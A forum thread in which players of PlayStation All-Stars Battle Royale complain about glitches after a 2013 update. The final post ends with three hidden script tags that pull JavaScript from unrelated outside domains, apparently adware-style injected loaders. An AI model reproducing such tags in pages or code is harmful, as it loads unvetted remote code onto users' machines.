Feb 18 2013
By: IzoGray Sackboy 538 posts

Glitches Caused By The Update. Fix This Now

7 replies 290 views Edited Feb 18, 2013

I've noticed a ton of glitches since the update.

First and foremost is the lag. I notice it only happens when Kat and Emmett are involved. The entire match is plagued with a slow down. It's like a slow motion mode. It's ridiculous. 

Second is Parappa's Boom Box Glitch. If you don't know what it is, it basically releases a ton of AP. I mean tons.

Third, this problem has been here since the game released. Fix this **bleep** problem. Jesus Christ did you guys **bleep** this game up in so many ways. Every once in a while, after I pick my character and go to quick match or ranked match, it will pick a random character for me.

Do you realize what **bleep** it is to be playing in a ranked match, about to get to the next belt level, when you realize that it picked some random character you didn't even level past 20?

So fix the lag, the character switching, and Parappa's Boom Box,.

Then when you have those things fixed, and believe me, if you don't fix them I will not recommend this game to anyone anymore, fix the **bleep** character costume select screens. Was your budget that poor that you couldn't put in actual pictures of the characters with their alternate colors?? It looks like total **bleep**. A fifth grader might as well have designed this game aesthetically. I swear to God though, fifth graders would have had more pride in their work.

Message 1 of 8 (290 Views)
Fender Bender
2913 posts

Re: Glitches Caused By The Update. Fix This Now

Feb 18, 2013

No music in stages should also be fixed.

Message 2 of 8 (277 Views)
0 Likes
Sackboy
538 posts

Feb 19, 2013
bump
Message 3 of 8 (219 Views)
0 Likes
Wastelander
827 posts

[ Edited ]
Feb 19, 2013

apparantly their is a button combo that puts you in a roll or block state without even pressing L1......

Message 4 of 8 (198 Views)
0 Likes
Wastelander
629 posts

[ Edited ]
Feb 19, 2013

It is possible that the Parappa glitch has been here all this time and we haven't discovered it until now.

I'm thinking about going back to the Beta and try it out to test this theory but I guess that wouldn't work because of the lack of platforms....Oh well we will never know.

Currently Playing: Playstation not All Stars Battle Royale
#TheBelievers
Uploaded with ImageShack.us
Message 5 of 8 (187 Views)
0 Likes
Hekseville Citizen
398 posts

Feb 19, 2013

Don't forget sometimes when you finish matches it shows you leveling up alot more than you actually do. Like you may gain like 30-45 levels only to have gained 2-5. Started after the update.

Message 6 of 8 (179 Views)
0 Likes
Sackboy
538 posts

Feb 23, 2013
Don't let this leave the front page. These devs need to know these glitches are pissing us off
Message 7 of 8 (130 Views)
0 Likes
Highlighted
Gaming Beast
2167 posts

Feb 24, 2013
Didn't the beta have Hades as a playable stage?

Also, yeah the Parappa glitch isn't new, but Ayla's for some reason told the general public about it recently.

That being said there's A LOT more than just those glitches to fix...

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 8 of 8 (75 Views)
0 Likes